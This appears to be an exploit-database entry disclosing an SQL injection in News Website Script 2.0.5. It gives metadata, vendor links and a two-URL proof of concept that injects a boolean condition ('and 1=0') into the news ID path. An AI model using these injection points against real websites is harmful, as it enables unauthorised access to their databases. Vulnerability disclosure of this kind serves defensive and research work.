News Website Script 2.0.5 - SQL Injection

Author: Mr Winst0n
type: webapps
platform: php
port: 
date_added: 2019-02-25  
date_updated: 2019-02-25  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 46456.txt  

# Exploit Title: News Website Script 2.0.5 - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 22, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/news-website-script/
# Tested Version: 2.0.5
# Tested on: Kali linux, Windows 8.1


# PoC:

# http://localhost/[PATH]/index.php/show/news/11 [SQL]/

# http://localhost/[PATH]/index.php/show/news/11%20and%201=0/Sports/january-25-2018/Pogba-still-has-to-improve-Allegri